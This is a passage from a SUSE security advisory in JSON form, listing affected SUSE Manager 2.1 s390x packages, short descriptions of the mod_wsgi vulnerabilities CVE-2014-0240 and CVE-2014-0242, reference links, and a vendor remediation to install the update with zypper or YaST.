"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "important"
}
],
"title": "CVE-2014-0114"
},
{
"cve": "CVE-2014-0240",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-0240"
}
],
"notes": [
{
"category": "general",
"text": "The mod_wsgi module before 3.5 for Apache, when daemon mode is enabled, does not properly handle error codes returned by setuid when run on certain Linux kernels, which allows local users to gain privileges via vectors related to the number of running processes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-0240",
"url": "https://www.suse.com/security/cve/CVE-2014-0240"
},
{
"category": "external",
"summary": "SUSE Bug 878550 for CVE-2014-0240",
"url": "https://bugzilla.suse.com/878550"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "important"
}
],
"title": "CVE-2014-0240"
},
{
"cve": "CVE-2014-0242",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-0242"
}
],
"notes": [
{
"category": "general",
"text": "mod_wsgi module before 3.4 for Apache, when used in embedded mode, might allow remote attackers to obtain sensitive information via the Content-Type header which is generated from memory that may have been freed and then overwritten by a separate thread.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-0242",
"url": "https://www.suse.com/security/cve/CVE-2014-0242"
},
{
"category": "external",
"summary": "SUSE Bug 878553 for CVE-2014-0242",
"url": "https://bugzilla.suse.com/878553"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
